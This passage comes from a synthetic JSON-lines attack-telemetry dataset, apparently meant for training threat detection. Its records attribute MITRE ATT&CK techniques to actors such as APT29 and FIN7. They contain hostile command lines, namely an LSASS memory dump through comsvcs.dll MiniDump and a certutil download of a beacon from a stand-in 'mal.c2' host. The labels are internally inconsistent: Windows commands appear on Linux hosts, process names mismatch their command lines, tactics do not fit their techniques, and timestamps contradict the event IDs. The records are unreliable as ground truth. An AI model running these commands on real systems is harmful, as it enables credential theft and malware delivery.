(DS0017)","timestamp":"2025-03-25T15:33:36.000Z","user":{"name":"arn:aws:iam::90v94uiozuc2","sid":"S-1-5-21-776930050-605828035-5733"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260618T202844000Z_0018389","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.75.39.153","name":"IAM-ROLE-DE8I6LRETO","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18389FIN7T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.1.48.245","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1393 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-20T02:39:10.000Z","user":{"name":"azuread\\nfuikkgzkh9a","sid":"S-1-5-21-530389783-653263889-5790"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Impact"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20260510T221820000Z_0018391","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.170.4.106","name":"WIN-FIN-SRV-5DPNEVJYF8","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18391Mustang PandaT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.113.62.205","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-01T02:33:23.000Z","user":{"name":"arn:aws:iam::umygrbkq3ty7","sid":"S-1-5-21-280804039-402711981-1635"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Execution"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250612T024928000Z_0018393","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.132.77.210","name":"EC2-INST-HDOXZEDPR4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18393Mustang PandaT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.157.5.143","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1368 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-02T10:25:09.000Z","user":{"name":"i-9s9hcrb62zud","sid":"S-1-5-21-866684766-733288692-3072"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1570"},"event_id":"evt_apt41_20260201T004539000Z_0018395","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.132.158.64","name":"APP-WEB-PR8MSHPCPB","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18395APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.241.123","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2791 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-11-27T22:22:07.000Z","user":{"name":"arn:aws:iam::v131izfg18va","sid":"S-1-5-21-252282458-752714933-2934"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_apt29_20260331T081352000Z_0018397","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.216.17.142","name":"AZURE-VM-3Z21TG5704","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18397APT29T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.175.174.41","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-06-20T07:44:55.000Z","user":{"name":"CORP\\xihcrgsvl5u0","sid":"S-1-5-21-134990276-152178023-7659"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260824T013457000Z_0018399","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.234.37","name":"DB-ORACLE-4CY9960NRS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18399APT29T1003.001"},"network":{"domain":"github.com","dst_ip":"1.15.189.198","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-03T10:25:37.000Z","user":{"name":"svc_olpr7bzidqti","sid":"S-1-5-21-374919485-258857800-5404"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.